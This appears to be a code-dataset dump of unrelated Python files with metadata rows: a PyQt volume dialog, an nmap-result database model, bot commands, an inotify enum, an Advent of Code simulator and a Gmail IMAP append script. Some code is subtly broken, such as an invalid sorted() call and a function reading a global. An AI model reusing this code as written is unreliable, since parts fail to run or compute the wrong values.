self.gridLayout.addWidget(self.box_mute_1, 3, 3, 1, 1)
self.box_mute_2 = QtGui.QCheckBox(Dialog)
self.box_mute_2.setObjectName("box_mute_2")
self.gridLayout.addWidget(self.box_mute_2, 4, 3, 1, 1)
self.box_mute_3 = QtGui.QCheckBox(Dialog)
self.box_mute_3.setObjectName("box_mute_3")
self.gridLayout.addWidget(self.box_mute_3, 5, 3, 1, 1)
self.box_mute_4 = QtGui.QCheckBox(Dialog)
self.box_mute_4.setObjectName("box_mute_4")
self.gridLayout.addWidget(self.box_mute_4, 6, 3, 1, 1)
self.box_mute_all = QtGui.QCheckBox(Dialog)
self.box_mute_all.setObjectName("box_mute_all")
self.gridLayout.addWidget(self.box_mute_all, 0, 3, 1, 1)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
Dialog.setWindowTitle(QtGui.QApplication.translate("Dialog", "Volume Editor", None, QtGui.QApplication.UnicodeUTF8))
self.volume_label_0.setText(QtGui.QApplication.translate("Dialog", "Cheerful Charlie", None, QtGui.QApplication.UnicodeUTF8))
self.volume_label_1.setText(QtGui.QApplication.translate("Dialog", "Sad Sandy", None, QtGui.QApplication.UnicodeUTF8))
self.volume_settings_1.setToolTip(QtGui.QApplication.translate("Dialog", "Adjust the volume of this voice", None, QtGui.QApplication.UnicodeUTF8))
self.volume_label_2.setText(QtGui.QApplication.translate("Dialog", "Bartitone Bob", None, QtGui.QApplication.UnicodeUTF8))
self.volume_settings_2.setToolTip(QtGui.QApplication.translate("Dialog", "Adjust the volume of this voice", None, QtGui.QApplication.UnicodeUTF8))
self.volume_label_3.setText(QtGui.QApplication.translate("Dialog", "Melodic Mary", None, QtGui.QApplication.UnicodeUTF8))
self.volume_settings_3.setToolTip(QtGui.QApplication.translate("Dialog", "Adjust the volume of this voice", None, QtGui.QApplication.UnicodeUTF8))
self.volume_label_4.setText(QtGui.QApplication.translate("Dialog", "Precise Pete", None, QtGui.QApplication.UnicodeUTF8))
self.volume_settings_4.setToolTip(QtGui.QApplication.translate("Dialog", "Adjust the volume of this voice", None, QtGui.QApplication.UnicodeUTF8))
self.volume_settings_0.setToolTip(QtGui.QApplication.translate("Dialog", "Adjust the volume of this voice", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_0.setText(QtGui.QApplication.translate("Dialog", "Mute", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_1.setText(QtGui.QApplication.translate("Dialog", "Mute", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_2.setText(QtGui.QApplication.translate("Dialog", "Mute", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_3.setText(QtGui.QApplication.translate("Dialog", "Mute", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_4.setText(QtGui.QApplication.translate("Dialog", "Mute", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_all.setText(QtGui.QApplication.translate("Dialog", "Mute all", None, QtGui.QApplication.UnicodeUTF8))
| 62.339286 | 154 | 0.728445 | 915 | 6,982 | 5.331148 | 0.112568 | 0.129151 | 0.158672 | 0.111521 | 0.742722 | 0.643501 | 0.317343 | 0.202747 | 0.202747 | 0.202747 | 0 | 0.042886 | 0.158407 | 6,982 | 111 | 155 | 62.900901 | 0.78727 | 0.03108 | 0 | 0 | 1 | 0 | 0.091474 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020408 | false | 0 | 0.010204 | 0 | 0.040816 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
eabea33f4d0ec179914a2f9d513c08deb93370e0 | 2,780 | py | Python | pipeline/models/nmap_model.py | ponderng/recon-pipeline | 11d09902c54969af47731b8e235e447806246004 | [
"MIT"
] | 352 | 2020-01-22T13:36:11.000Z | 2022-03-22T19:37:24.000Z | pipeline/models/nmap_model.py | ponderng/recon-pipeline | 11d09902c54969af47731b8e235e447806246004 | [
"MIT"
] | 72 | 2020-01-24T04:53:52.000Z | 2021-07-14T19:23:29.000Z | pipeline/models/nmap_model.py | ponderng/recon-pipeline | 11d09902c54969af47731b8e235e447806246004 | [
"MIT"
] | 86 | 2020-01-23T09:20:51.000Z | 2022-03-03T08:04:37.000Z | import textwrap
from sqlalchemy.orm import relationship
from sqlalchemy import Column, Integer, ForeignKey, String, Boolean
from .base_model import Base
from .port_model import Port
from .ip_address_model import IPAddress
from .nse_model import nse_result_association_table
class NmapResult(Base):
""" Database model that describes the TARGET.nmap scan results.
Represents nmap data.
Relationships:
``target``: many to one -> :class:`pipeline.models.target_model.Target`
``ip_address``: one to one -> :class:`pipeline.models.ip_address_model.IPAddress`
``port``: one to one -> :class:`pipeline.models.port_model.Port`
``nse_results``: one to many -> :class:`pipeline.models.nse_model.NSEResult`
"""
def __str__(self):
return self.pretty()
def pretty(self, commandline=False, nse_results=None):
pad = " "
ip_address = self.ip_address.ipv4_address or self.ip_address.ipv6_address
msg = f"{ip_address} - {self.service}\n"
msg += f"{'=' * (len(ip_address) + len(self.service) + 3)}\n\n"
msg += f"{self.port.protocol} port: {self.port.port_number} - {'open' if self.open else 'closed'} - {self.reason}\n"
msg += f"product: {self.product} :: {self.product_version}\n"
msg += "nse script(s) output:\n"
if nse_results is None:
# add all nse scripts
for nse_result in self.nse_results:
msg += f"{pad}{nse_result.script_id}\n"
msg += textwrap.indent(nse_result.script_output, pad * 2)
msg += "\n"
else:
# filter used, only return those specified
for nse_result in nse_results:
if nse_result in self.nse_results:
msg += f"{pad}{nse_result.script_id}\n"
msg += textwrap.indent(nse_result.script_output, pad * 2)
msg += "\n"
if commandline:
msg += "command used:\n"
msg += f"{pad}{self.commandline}\n"
return msg
__tablename__ = "nmap_result"
id = Column(Integer, primary_key=True)
open = Column(Boolean)
reason = Column(String)
service = Column(String)
product = Column(String)
commandline = Column(String)
product_version = Column(String)
port = relationship(Port)
port_id = Column(Integer, ForeignKey("port.id"))
ip_address = relationship(IPAddress)
ip_address_id = Column(Integer, ForeignKey("ip_address.id"))
target_id = Column(Integer, ForeignKey("target.id"))
target = relationship("Target", back_populates="nmap_results")
nse_results = relationship("NSEResult", secondary=nse_result_association_table, back_populates="nmap_results")
| 35.641026 | 124 | 0.632014 | 344 | 2,780 | 4.918605 | 0.267442 | 0.058511 | 0.054374 | 0.031915 | 0.159574 | 0.14539 | 0.113475 | 0.113475 | 0.113475 | 0.113475 | 0 | 0.002396 | 0.249281 | 2,780 | 77 | 125 | 36.103896 | 0.808337 | 0.170863 | 0 | 0.125 | 0 | 0.020833 | 0.199198 | 0.057932 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.145833 | 0.020833 | 0.5625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
eac399423be5d4d4f542d0d58d41f6e21f9aff4b | 607 | py | Python | pycorrector/utils/io_utils.py | zouning68/pycorrector | 4daaf13e566f2cecc724fb5a77db5d89f1f25203 | [
"Apache-2.0"
] | 45 | 2020-01-18T03:46:07.000Z | 2022-03-26T13:06:36.000Z | pycorrector/utils/io_utils.py | zouning68/pycorrector | 4daaf13e566f2cecc724fb5a77db5d89f1f25203 | [
"Apache-2.0"
] | 1 | 2020-08-16T12:42:05.000Z | 2020-08-16T12:42:05.000Z | pycorrector/utils/io_utils.py | zouning68/pycorrector | 4daaf13e566f2cecc724fb5a77db5d89f1f25203 | [
"Apache-2.0"
] | 9 | 2020-01-04T09:09:01.000Z | 2022-01-17T08:56:23.000Z | # -*- coding: utf-8 -*-
# Author: XuMing <xuming624@qq.com>
# Brief:
import os
import pickle
def load_pkl(pkl_path):
"""
加载词典文件
:param pkl_path:
:return:
"""
with open(pkl_path, 'rb') as f:
result = pickle.load(f)
return result
def dump_pkl(vocab, pkl_path, overwrite=True):
"""
存储文件
:param pkl_path:
:param overwrite:
:return:
"""
if os.path.exists(pkl_path) and not overwrite:
return
with open(pkl_path, 'wb') as f:
# pickle.dump(vocab, f, protocol=pickle.HIGHEST_PROTOCOL)
pickle.dump(vocab, f, protocol=0)
| 19.580645 | 65 | 0.599671 | 82 | 607 | 4.317073 | 0.463415 | 0.138418 | 0.067797 | 0.096045 | 0.254237 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011186 | 0.263591 | 607 | 30 | 66 | 20.233333 | 0.780761 | 0.332784 | 0 | 0 | 0 | 0 | 0.011396 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.181818 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
eac859440d6090d9d16a4764c580ec95eb663ba2 | 310 | py | Python | help.py | Wizard684/YouTube-DL-Mega | be11833353d116dbcd0a6af902a14cb5bca998a4 | [
"MIT"
] | null | null | null | help.py | Wizard684/YouTube-DL-Mega | be11833353d116dbcd0a6af902a14cb5bca998a4 | [
"MIT"
] | null | null | null | help.py | Wizard684/YouTube-DL-Mega | be11833353d116dbcd0a6af902a14cb5bca998a4 | [
"MIT"
] | null | null | null |
from pyrogram import Client, Filters
@Client.on_message(Filters.command(["help"]))
async def start(client, message):
helptxt = f"Currently Only supports Youtube Single (No playlist) Just Send Youtube Url But You must join my Updation channel👉👉 @Mega_Bots_Updates"
await message.reply_text(helptxt)
| 34.444444 | 151 | 0.767742 | 45 | 310 | 5.244444 | 0.844444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145161 | 310 | 8 | 152 | 38.75 | 0.883019 | 0 | 0 | 0 | 0 | 0.2 | 0.446602 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
eacc2257b27de8eb2645ec30a826a06701432acc | 972 | py | Python | addons/meme.py | 916253/Kurisu-Reswitched | 143c27e42049de8ccc8c5c76f503ea96e89c179c | [
"Apache-2.0"
] | 13 | 2017-08-18T00:25:26.000Z | 2020-12-06T00:59:47.000Z | addons/meme.py | 916253/Kurisu-Reswitched | 143c27e42049de8ccc8c5c76f503ea96e89c179c | [
"Apache-2.0"
] | 11 | 2018-04-13T16:57:13.000Z | 2018-12-23T11:52:19.000Z | addons/meme.py | 916253/Kurisu-Reswitched | 143c27e42049de8ccc8c5c76f503ea96e89c179c | [
"Apache-2.0"
] | 21 | 2017-08-04T16:33:15.000Z | 2019-03-11T17:01:48.000Z | import discord
import random
from discord.ext import commands
class Meme:
"""
Meme commands.
"""
def __init__(self, bot):
self.bot = bot
print('Addon "{}" loaded'.format(self.__class__.__name__))
@commands.command(pass_context=True, hidden=True, name="bam")
async def bam_member(self, ctx, user: discord.Member, *, reason=""):
"""Bams a user owo"""
await self.bot.say("{} is ̶n͢ow b̕&̡.̷ 👍̡".format(self.bot.escape_name(user)))
@commands.command(pass_context=True, hidden=True, name="warm")
async def warm_member(self, ctx, user: discord.Member, *, reason=""):
"""Warms a user :3"""
await self.bot.say("{} warmed. User is now {}°C.".format(user.mention, str(random.randint(0, 100))))
@commands.command(hidden=True)
async def frolics(self):
"""test"""
await self.bot.say("https://www.youtube.com/watch?v=VmarNEsjpDI")
def setup(bot):
bot.add_cog(Meme(bot))
| 29.454545 | 108 | 0.622428 | 139 | 972 | 4.280576 | 0.489209 | 0.070588 | 0.060504 | 0.07563 | 0.268908 | 0.268908 | 0.268908 | 0.147899 | 0 | 0 | 0 | 0.006427 | 0.199588 | 972 | 32 | 109 | 30.375 | 0.748072 | 0.014403 | 0 | 0 | 0 | 0 | 0.130337 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0.111111 | 0.166667 | 0 | 0.333333 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
ead2a27fde0318e6470fc8deff78230ddd7bed04 | 803 | py | Python | fitter.py | quantummind/quantum-rcs-boundaries | 5c1da3378b72db061960f113dfed77b506f9acae | [
"MIT"
] | null | null | null | fitter.py | quantummind/quantum-rcs-boundaries | 5c1da3378b72db061960f113dfed77b506f9acae | [
"MIT"
] | null | null | null | fitter.py | quantummind/quantum-rcs-boundaries | 5c1da3378b72db061960f113dfed77b506f9acae | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import curve_fit
from sklearn.metrics import r2_score
import datetime
def func(x, a, b):
return a + b*x
def exp_regression(x, y):
p, _ = curve_fit(func, x, np.log(y))
p[0] = np.exp(p[0])
return p
def r2(coeffs, x, y):
return r2_score(np.log(y), np.log(out[0]*np.exp(out[1]*x)))
# calculate exponential fit for error rate extrapolation
# report as annual decay (i.e. error rate decreases by fixed factor every year)
errors = pd.read_csv('error_rates.csv')
x = pd.to_datetime(errors.iloc[:, 0]).astype(int)
y = errors.iloc[:, 1]
out = exp_regression(x, y)
print('annual error rate decay', np.exp(out[1]*pd.Timedelta(datetime.timedelta(days=365.2422)).delta))
print('R^2', r2(out, x, y)) | 30.884615 | 102 | 0.697385 | 147 | 803 | 3.741497 | 0.455782 | 0.014545 | 0.050909 | 0.054545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027982 | 0.154421 | 803 | 26 | 103 | 30.884615 | 0.782032 | 0.164384 | 0 | 0 | 0 | 0 | 0.061286 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15 | false | 0 | 0.3 | 0.1 | 0.6 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
ead9a8850641b407ccfaaf3b32efd4d1d2d9ec12 | 2,869 | py | Python | notes/reference/moocs/udacity/cs50-introduction-to-computer-science/assignments/pset1/pennies/pennies.py | aav789/study-notes | 34eca00cd48869ba7a79c0ea7d8948ee9bde72b9 | [
"MIT"
] | 43 | 2015-06-10T14:48:00.000Z | 2020-11-29T16:22:28.000Z | notes/reference/moocs/udacity/cs50-introduction-to-computer-science/assignments/pset1/pennies/pennies.py | aav789/study-notes | 34eca00cd48869ba7a79c0ea7d8948ee9bde72b9 | [
"MIT"
] | 1 | 2021-11-01T12:01:44.000Z | 2021-11-01T12:01:44.000Z | notes/reference/moocs/udacity/cs50-introduction-to-computer-science/assignments/pset1/pennies/pennies.py | lextoumbourou/notes | 5f94c59a467eb3eb387542bdce398abc0365e6a7 | [
"MIT"
] | 40 | 2015-03-02T10:33:59.000Z | 2020-05-24T12:17:05.000Z | """
pennies.py
Computer Science 50 in Python (Hacker Edition)
Problem Set 1
Get num of days in month then works out how many $$ you'd have by end of the month
if you received a penny on the first day, two on second, four on third and so on
"""
def get_input(question):
"""Get the days input from the user """
return raw_input(question + " ")
def is_valid_days(days):
"""Check if the number of days is between 28 and 31"""
try:
days = int(days)
except ValueError:
print "Not a valid integer"
return False
if days < 28 or days > 31:
print "Not a valid number of days"
return False
return days
def is_valid_cents(cents):
"""Ensure number of cents is a valid int"""
try:
return int(cents)
except ValueError:
print "That's not a number."
return False
class Exponenter():
days = None
cents = None
dols = None
def __init__(self, cents, days):
"""
Takes an integer of cents and days
then performs exponent analysis
"""
self.cents = cents
self.days = days
self.final_cents = self._exponent()
def __unicode__(self):
"""Return the string output in $00,000,000 format"""
output = ""
# Reverse the string using extended slice syntax
rev_dols = "{0:.2f}".format(self.dols)[::-1]
# If the dollars is more than 1000, add a comma every 3 digits
if self.dols >= 1000:
for count, char in enumerate(rev_dols):
count += 1
output += char
if count <= 3:
# Ignore first 3 characters, as they're decimal points
continue
if count % 3 is 0 and len(rev_dols) is not count:
# For every 3 characters, that's not the last one, add a ,
output += ","
else:
output = rev_dols
# Reverse the output and return it
str_dols = output[::-1]
return "${0}".format(str_dols)
def __repr__(self):
"""Return the representation as float of dollars"""
return "{0}".format(self.dols)
def _exponent(self):
# For each day, multiply the cents by an incrementer that doubles each time
inc = 1
for day in range(1, self.days+1):
final_cents = self.cents*inc
inc += inc
# Return the number of dollars (cents/100)
self.dols = final_cents/float(100)
return final_cents
if __name__ == '__main__':
days = False
while not days:
days = is_valid_days(get_input("Number of days in month? "))
cents = False
while not cents:
cents = is_valid_cents(get_input("Numbers of cents on first day? "))
exp = Exponenter(cents, days)
print "{0}".format(unicode(exp))
| 27.586538 | 83 | 0.580342 | 394 | 2,869 | 4.114213 | 0.347716 | 0.024676 | 0.022209 | 0.016039 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026028 | 0.330429 | 2,869 | 103 | 84 | 27.854369 | 0.817803 | 0.127222 | 0 | 0.118644 | 0 | 0 | 0.077325 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.067797 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
eaddd0f58ee1e0957f0264ad5e92e223afa6c673 | 2,753 | py | Python | minotaur/_mask.py | trel/minotaur | 608f13582e88677fc946c6cb84ec03459f29b4f9 | [
"Apache-2.0"
] | null | null | null | minotaur/_mask.py | trel/minotaur | 608f13582e88677fc946c6cb84ec03459f29b4f9 | [
"Apache-2.0"
] | null | null | null | minotaur/_mask.py | trel/minotaur | 608f13582e88677fc946c6cb84ec03459f29b4f9 | [
"Apache-2.0"
] | null | null | null | from enum import IntFlag as _IntFlag
from . import _inotify
__all__ = ('Mask',)
class Mask(_IntFlag):
show_help: bool
def __new__(cls, value, doc=None, show_help=True):
# int.__new__ needs a stub in the typeshed
# https://github.com/python/typeshed/issues/2686
#
# but that broke something else, so they removed it
# https://github.com/python/typeshed/issues/1464
#
# We have no choice but to ignore mypy error here :(
self = int.__new__(cls, value) # type: ignore
self._value_ = value
if doc is not None:
self.__doc__ = doc
self.show_help = show_help
return self
"""
Flags for establishing inotify watches.
"""
ACCESS = _inotify.IN_ACCESS, 'File was accessed'
ATTRIB = _inotify.IN_ATTRIB, 'Metaata changed, eg. permissions'
CLOSE_WRITE = _inotify.IN_CLOSE_WRITE, 'File for writing was closed'
CLOSE_NOWRITE = _inotify.IN_CLOSE_NOWRITE, \
'File or dir not opened for writing was closed'
CREATE = _inotify.IN_CREATE, 'File/dir was created'
DELETE = _inotify.IN_DELETE, 'File or dir was deleted'
DELETE_SELF = _inotify.IN_DELETE_SELF, \
'Watched file/dir was itself deleted'
MODIFY = _inotify.IN_MODIFY, 'File was modified'
MOVE_SELF = _inotify.IN_MOVE_SELF, 'Watched file/dir was itself moved'
MOVED_FROM = _inotify.IN_MOVED_FROM, \
'Generated for dir containing old filename when a file is renamed'
MOVED_TO = _inotify.IN_MOVED_TO, \
'Generated for dir containing new filename when a file is renamed'
OPEN = _inotify.IN_OPEN, 'File or dir was opened'
MOVE = _inotify.IN_MOVE, 'MOVED_FROM | MOVED_TO'
CLOSE = _inotify.IN_CLOSE, 'IN_CLOSE_WRITE | IN_CLOSE_NOWRITE'
DONT_FOLLOW = _inotify.IN_DONT_FOLLOW, \
"Don't dereference pathname if it is a symbolic link"
EXCL_UNLINK = _inotify.IN_EXCL_UNLINK, \
"Don't generate events after files have been unlinked"
MASK_ADD = _inotify.IN_MASK_ADD, 'Add flags to an existing watch', False
ONESHOT = _inotify.IN_ONESHOT, 'Only generate one event for this watch'
ONLYDIR = _inotify.IN_ONLYDIR, 'Watch pathname only if it is a dir'
MASK_CREATE = _inotify.IN_MASK_CREATE, \
"Only watch path if it isn't already being watched"
# These are returned in events
IGNORED = _inotify.IN_IGNORED, 'Watch was removed', False
ISDIR = _inotify.IN_ISDIR, 'This event is a dir', False
Q_OVERFLOW = _inotify.IN_Q_OVERFLOW, 'Event queue overflowed', False
UNMOUNT = _inotify.IN_UNMOUNT, \
'Filesystem containing watched object was unmounted', False
EVENT_TYPE = _inotify.EVENT_TYPE_MASK, 'Mask of all event types', False
| 39.328571 | 76 | 0.68834 | 386 | 2,753 | 4.626943 | 0.365285 | 0.120941 | 0.023516 | 0.022396 | 0.097424 | 0.097424 | 0 | 0 | 0 | 0 | 0 | 0.003788 | 0.232837 | 2,753 | 69 | 77 | 39.898551 | 0.841856 | 0.100618 | 0 | 0 | 0 | 0 | 0.349233 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022222 | false | 0 | 0.044444 | 0 | 0.688889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
eadee64286add827e7acf16d36f21a8972ee0cfb | 4,991 | py | Python | 24_immune_system_simulator.py | KanegaeGabriel/advent-of-code-2018 | b57f21901b731b4ffe6a2bf134d0bda28d326997 | [
"MIT"
] | null | null | null | 24_immune_system_simulator.py | KanegaeGabriel/advent-of-code-2018 | b57f21901b731b4ffe6a2bf134d0bda28d326997 | [
"MIT"
] | null | null | null | 24_immune_system_simulator.py | KanegaeGabriel/advent-of-code-2018 | b57f21901b731b4ffe6a2bf134d0bda28d326997 | [
"MIT"
] | null | null | null | ################################################
# --- Day 24: Immune System Simulator 20XX --- #
################################################
import AOCUtils
def getTargets(atkArmy, defArmy):
targeted = set()
for atkGroup in atkArmy:
if len(targeted) < len(defArmy):
dmgGiven = []
for defGroup in defArmy:
dmg = (defGroup.calcDmgTaken(atkGroup), defGroup.getEffectivePower(), defGroup.initiative, defGroup)
dmgGiven.append(dmg)
dmgGiven.sort(reverse=True)
# Find best target that hasn't been targeted yet
take = 0
while dmgGiven[take][-1] in targeted:
take += 1
# Only select targets that would deal damage to
if dmgGiven[take][0] > 0:
targeted.add(dmgGiven[take][-1])
atkGroup.target = dmgGiven[take][-1]
else:
atkGroup.target = None
def battle(rawImmune, rawInfection, boost=0):
immuneArmy = [Group(rawGroup) for rawGroup in rawImmune]
infectionArmy = [Group(rawGroup) for rawGroup in rawInfection]
for g in immuneArmy: g.dmgAmt += boost
immuneArmyUnits = sum(g.units for g in immuneArmy)
infectionArmyUnits = sum(g.units for g in infectionArmy)
# Main battle round
while immuneArmyUnits > 0 and infectionArmyUnits > 0:
# Remove dead groups
effAndInit = lambda x: (x.getEffectivePower(), x.initiative)
immuneArmy = sorted(g for g in immuneArmy if g.alive, key=effAndInit, reverse=True)
infectionArmy = sorted(g for g in infectionArmy if g.alive, key=effAndInit, reverse=True)
getTargets(immuneArmy, infectionArmy)
getTargets(infectionArmy, immuneArmy)
kills = 0
allArmies = sorted(immuneArmy+infectionArmy, key=lambda x: x.initiative, reverse=True)
for army in allArmies:
if army.alive: # Only alive groups can attack, will be removed in the next round
kills += army.attack()
if kills == 0: # No kills in round = tie, would result in endless rounds
return None, None
immuneArmyUnits = sum(g.units for g in immuneArmy)
infectionArmyUnits = sum(g.units for g in infectionArmy)
return immuneArmyUnits, infectionArmyUnits
class Group:
def __init__(self, raw):
rawSplit = raw.split()
self.units = int(rawSplit[0])
self.hp = int(rawSplit[4])
self.immunities = []
self.weaknesses = []
if rawSplit[7].startswith("("):
weaksAndImmunes = raw.split("(")[1].split(")")[0].split("; ")
for wai in weaksAndImmunes:
if wai.startswith("weak"): self.weaknesses = wai[8:].split(", ")
elif wai.startswith("immune"): self.immunities = wai[10:].split(", ")
self.dmgAmt = int(rawSplit[-6])
self.dmgType = rawSplit[-5]
self.initiative = int(rawSplit[-1])
self.alive = True
self.target = None
def calcDmgTaken(self, attacker):
dmgAmtMult = 1
if attacker.dmgType in self.immunities: dmgAmtMult = 0
if attacker.dmgType in self.weaknesses: dmgAmtMult = 2
return attacker.getEffectivePower() * dmgAmtMult
def receiveAttack(self, attacker):
dmgAmt = self.calcDmgTaken(attacker)
unitsLost = dmgAmt // self.hp
if unitsLost > self.units: unitsLost = self.units
self.units -= unitsLost
if self.units <= 0:
self.alive = False
return unitsLost
def attack(self):
unitsLost = 0
if self.target:
unitsLost = self.target.receiveAttack(self)
self.target = None
return unitsLost
def getEffectivePower(self):
return self.units * self.dmgAmt
# def __repr__(self):
# return "U:{}, HP:{}, IMM:{}, WKN:{}, DMG:{}({}), EP:{}, INI:{}".format(
# self.units, self.hp, self.immunities, self.weaknesses,
# self.dmgAmt, self.dmgType, self.getEffectivePower(), self.initiative)
################################################
rawInput = [s for s in AOCUtils.loadInput(24) if s]
immuneStart, infectionStart = 0, rawInput.index("Infection:")
rawImmune = rawInput[immuneStart+1:infectionStart]
rawInfection = rawInput[infectionStart+1:]
immuneArmyUnits, infectionArmyUnits = battle(rawImmune, rawInfection)
print("Part 1: {}".format(max(immuneArmyUnits, infectionArmyUnits)))
boostLo, boostHi = 0, 1000 # Binary Search
while boostLo != boostHi:
boost = (boostLo + boostHi) // 2
immuneArmyUnits, infectionArmyUnits = battle(rawImmune, rawInfection, boost)
if immuneArmyUnits is None or immuneArmyUnits == 0: # Tie or loss
boostLo = boost + 1
else:
boostHi = boost
immuneArmyUnits, infectionArmyUnits = battle(rawImmune, rawInfection, boost)
print("Part 2: {}".format(immuneArmyUnits))
AOCUtils.printTimeTaken() | 34.659722 | 116 | 0.60569 | 528 | 4,991 | 5.710227 | 0.278409 | 0.009287 | 0.01393 | 0.021227 | 0.182421 | 0.121393 | 0.078275 | 0.057048 | 0.057048 | 0.057048 | 0 | 0.012768 | 0.262472 | 4,991 | 144 | 117 | 34.659722 | 0.806303 | 0.113404 | 0 | 0.126316 | 0 | 0 | 0.011483 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.010526 | null | null | 0.031579 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
eae24d8c828bb6bb378412becf7ee1a02837535c | 1,279 | py | Python | Imap_append.py | satheesheppalapelli/imap | 064ce69f9fdd63e3f7fbf402ef383c38b31fea14 | [
"MIT"
] | null | null | null | Imap_append.py | satheesheppalapelli/imap | 064ce69f9fdd63e3f7fbf402ef383c38b31fea14 | [
"MIT"
] | null | null | null | Imap_append.py | satheesheppalapelli/imap | 064ce69f9fdd63e3f7fbf402ef383c38b31fea14 | [
"MIT"
] | null | null | null | import imaplib
import email
from email import message
import time
username = 'gmail_id'
password = 'gmail_password'
new_message = email.message.Message()
new_message.set_unixfrom('satheesh')
new_message['Subject'] = 'Sample Message'
# from gmail id
new_message['From'] = 'eppalapellisatheesh1@gmail.com'
# to gmail id
new_message['To'] = 'eppalapellisatheesh1@gmail.com'
# message data
new_message.set_payload('This is the body of the message.\n')
# print(new_message)
# you want to connect to a server; specify which server and port
# server = imaplib.IMAP4('server', 'port')
server = imaplib.IMAP4_SSL('imap.googlemail.com')
# after connecting, tell the server who you are to login to gmail
# server.login('user', 'password')
server.login(username, password)
# this will show you a list of available folders
# possibly your Inbox is called INBOX, but check the list of mailboxes
response, mailboxes = server.list()
if response == 'OK':
response, data = server.select("Inbox")
response = server.append('INBOX', '', imaplib.Time2Internaldate(time.time()), str(new_message).encode('utf-8'))
# print(response)
if response[0] == 'OK':
print("Gmail Appended Successfully")
else:
print("Not Appended")
server.close()
server.logout()
